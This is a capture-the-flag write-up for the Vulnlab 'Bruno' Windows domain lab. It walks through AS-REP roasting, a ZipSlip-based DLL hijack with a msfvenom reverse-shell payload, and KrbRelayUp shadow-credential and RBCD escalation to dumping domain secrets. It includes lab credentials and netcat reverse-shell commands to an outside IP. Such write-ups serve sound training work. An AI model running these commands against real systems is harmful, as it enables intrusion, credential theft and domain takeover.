CTF-Writeups/Vulnlab/Bruno.md

Vulnlab - Bruno

PORT      STATE SERVICE    VERSION   
21/tcp    open  tcpwrapped
53/tcp    open  tcpwrapped
80/tcp    open  tcpwrapped                    
135/tcp   open  tcpwrapped             
139/tcp   open  tcpwrapped             
443/tcp   open  tcpwrapped
88/tcp open  kerberos-sec
| tls-alpn:                                      
|_  http/1.1              
| ssl-cert: Subject: commonName=bruno-BRUNODC-CA
| Issuer: commonName=bruno-BRUNODC-CA
| Public Key type: rsa    
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-06-29T13:23:01
| Not valid after:  2121-06-29T13:33:00
| MD5:   659b3c9000eb1e0a51701be90456840c 
|_SHA-1: a093f4c23c8e053286f21e99cad782f8e40e3d72
445/tcp   open  tcpwrapped
636/tcp   open  tcpwrapped
| ssl-cert: Subject: commonName=brunodc.bruno.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:brunodc.bruno.vl
| Issuer: commonName=bruno-BRUNODC-CA
| Public Key type: rsa               
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-08-22T06:05:15     
| Not valid after:  2024-08-21T06:05:15
| MD5:   1f78c03b2d8da3ec00765fcc68d5973b
|_SHA-1: be3a109df3cfefcf7a8078654bbbf09ae7950fd5
3269/tcp  open  tcpwrapped
| ssl-cert: Subject: commonName=brunodc.bruno.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:brunodc.bruno.vl
| Issuer: commonName=bruno-BRUNODC-CA
3389/tcp  open  tcpwrapped
| ssl-cert: Subject: commonName=brunodc.bruno.vl
| Issuer: commonName=brunodc.bruno.vl

PORT 21 (FTP)

Logging in as an anonymous user on FTP, we can find few directories

From app folder, there's SampleScanner

Reading the changelog file we can see a username svc_scan

Since we are targeting a domain controller, we can check for ASREP roasting (accounts with pre-authentication disabled)

Having the hash, attempting to crack it against hashcat

hashcat -a 0 -m 18200 ./svc_scan.txt /usr/share/wordlists/rockyou.txt  --force

Listing the shares with this user, we have write access on `queue`

On this point, we need to understand what sample scanner is doing and what's the use of this queue share folder, using ILSpy to analyze the SampleScanner.dll

DLL Hijacking

This dll looks for a zip file in C:\Samples\queue , extracts the file and deletes the zip file, if it's not a zip file it checks for the occurrence of the AV test file pattern defined by the text string and place it into malicious folder else it places it into bengin folder, so running this locally by transferring all required files

Creating \sample\queue in C:\ and placing a zip file for testing

Running SampleScanner will extract the contents of the zip file

Here we canperform path traversal to extract the file in any location which is known as ZipSlip, for creating a malicious zip file we can use evilarc.py (https://github.com/ptoomey3/evilarc) or we can use 7zip to edit the filename to be ..\file.txt

This will extract the contents of evil.zip outside the directory of C:\Samples\queue

Since this is being ran with svc_scan we can achieve remote code execution by replacing the dll being used with SampleScanner, for that we need to analyze which dll we need to place, with Process Monitor we can analyze which DLL is missing from the program by applying filters for the DLLs which are not found by the exe

Here we see two DLLs which are being used by this program but are not found in the current path, hostfxr.dll and Microsoft.DiaSymReader.Native.amd64.dll , generating a dll through msfvenom and replacing the DiaSymReader dll

msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.154 LPORT=2222 -f dll > test.dll

Executing SampleScanner now will trigger a reverse shell as we have placed our maclious dll

To do this on the target machine, we need to place the dll with a path traversal ..\app\Microsoft.DiaSymReader.Native.amd64.dll, since svc_scan has write access to queue share folder we can upload the archive file through smb

Within seconds we'll receive a connection on our listener

Checking the privileges of svc_scan user, it have any interesting privileges

Running python-bloodhound to enumerate the domain

python3 bloodhound.py -u 'svc_scan' -p 'Sunshine1' -d 'bruno.vl' -c all -ns 10.10.84.94 --auth-method ntlm

There wasn't any path leading to domain admin from svc_scan However we can see `svc_net` being AS-REP roastable Through `GetNPUsers.py` we can retrieve TGT of svc_net and attempt to crack it

GetNPUsers.py bruno.vl/svc_net -no-pass -dc-ip 10.10.108.253

Which is the same password as svc_scan, also this user doesn't didn't had any special privileges, from winpeas we can see target being vulnerable to `KrbRelayUp`

Shadow Credentials

To escalate privileges through KrbRelayUp, we need ensure that LDAP singing is disabled and we are allowed to add a machine account, however this is optional as we can abuse shadow credentials if PKINT is supported by DC, through cme we can verify the machine qouta

cme ldap bruno.vl -u 'svc_scan' -p 'Sunshine1' -M maq

Also we can see ldap signing is not enforced

cme ldap bruno.vl -u 'svc_scan' -p 'Sunshine1' -M ldap-checker

For using krbrealyup, we need a valid CLSID, I grabbed the certsrv ID from https://vulndev.io/cheats-windows/

Using the shadow credentials method on port 10246, as this was the port which was available

.\KrbRelayUp.exe full -m shadowcred -cls {d99e6e73-fc88-11d0-b498-00a0c90312f3} -p 10246

Now using Rubeus, to request a TGT for brunodc through PKINT authentication

Rubeus.exe asktgt /user:brunodc$ /certificate:MIIKSAIBAzCCCgQGC...snip.... /password:tV0-oN8$aB7- /enctype:AES256 /nowrap

Converting the kirbi ticket for brunodc to ccache so we can use it with secretsdump.py

secretsdump.py 'brunodc$'@brunodc.bruno.vl -k -no-pass

Resource Based Constrained Delegation

We can also perform Resource Based Constrained Delegation (RBCD) by creating machine account and that account in brunodc's msDS-AllowedToActOnBehalfOfOtherIdentity property

.\KrbRelayUp.exe full -m rbcd -c -cls {d99e6e73-fc88-11d0-b498-00a0c90312f3} -p 10246

Requesting the administrator's TGT through `getST.py`

Having the ticket, we can login through smbexec.py

References

• https://github.com/ptoomey3/evilarc
• https://github.com/cesarsotovalero/zip-slip-exploit-example/blob/master/README.md
• https://icyguider.github.io/2022/05/19/NoFix-LPE-Using-KrbRelay-With-Shadow-Credentials.html
• https://github.com/Dec0ne/KrbRelayUp
• https://vulndev.io/cheats-windows/
• http://ohpe.it/juicy-potato/CLSID/

svc_scan:Sunshine1

\RunasCs.exe svc_scan 'Sunshine1' -d bruno.vl 'C:\Users\svc_scan\nc64.exe 10.8.0.136 2222 -e cmd.exe' -l 9

.\RunasCs.exe svc_net "Sunshine1" "C:\Users\svc_scan\nc64.exe 10.8.0.136 2222 -e cmd.exe" -d bruno.vl -l 9